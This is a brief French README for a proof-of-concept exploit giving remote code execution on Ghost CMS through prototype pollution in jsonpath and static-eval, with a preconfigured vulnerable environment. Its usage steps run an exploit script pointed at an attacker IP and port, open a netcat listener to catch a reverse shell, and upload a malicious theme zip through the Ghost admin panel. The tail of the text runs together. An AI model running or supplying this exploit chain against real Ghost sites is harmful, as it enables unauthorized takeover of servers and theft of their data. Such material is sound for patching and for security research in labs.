
Preuve de concept d'exploitation pour l'exécution de code à distance sur Ghost CMS via la pollution de prototype dans jsonpath et static-eval, avec un environnement vulnérable préconfiguré et des instructions d'utilisation.
RCE sur Ghost CMS via la chaîne de prototypes jsonpath/static-eval.
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip dans Ghost Admin → Settings → Designrce/rce/